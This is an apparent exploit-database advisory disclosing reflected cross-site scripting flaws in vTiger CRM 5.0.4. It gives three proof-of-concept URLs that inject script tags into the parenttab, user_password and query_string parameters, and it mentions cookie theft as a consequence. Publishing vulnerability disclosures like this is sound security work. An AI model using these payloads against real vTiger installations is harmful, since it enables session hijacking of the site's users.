Lucene search
Fabian FingerleEDB-ID:32307HistorySep 01, 2008 - 12:00 a.m.
vTiger CRM 5.0.4 - Multiple Cross-Site Scripting Vulnerabilities
2008-09-0100:00:00
Fabian Fingerle
www.exploit-db.com
14
AI Score
7.4
Confidence
Low
source: https://www.securityfocus.com/bid/30951/info
vtiger CRM is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
vtiger CRM 5.0.4 is vulnerable; other versions may also be affected.
http://www.example.com/vtigercrm/index.php?module=Products&action=index&parenttab="><script>alert(1);</script>
http://www.example.com/vtigercrm/index.php?module=Users&action=Authenticate&user_password="><script>alert(1);</script>
http://www.example.com/vtigercrm/index.php?module=Home&action=UnifiedSearch&query_string="><script>alert(1);</script> Related
nvd
nvd
CVE-2008-3101
2008-09-03 14:12:00
CVE-2009-3247
2009-09-18 20:30:00
securityvulns
securityvulns
cvelist
cvelist
CVE-2008-3101
2008-09-03 14:00:00
CVE-2009-3247
2009-09-18 20:00:00
seebug
seebug
vtiger CRM多个跨站脚本漏洞
2008-09-10 00:00:00
packetstorm
packetstorm
vtigercrm-xss.txt
2008-09-03 00:00:00
prion
prion
Cross site scripting
2008-09-03 14:12:00
Cross site scripting
2009-09-18 20:30:00
cve
cve
CVE-2008-3101
2008-09-03 14:12:00
CVE-2009-3247
2009-09-18 20:30:00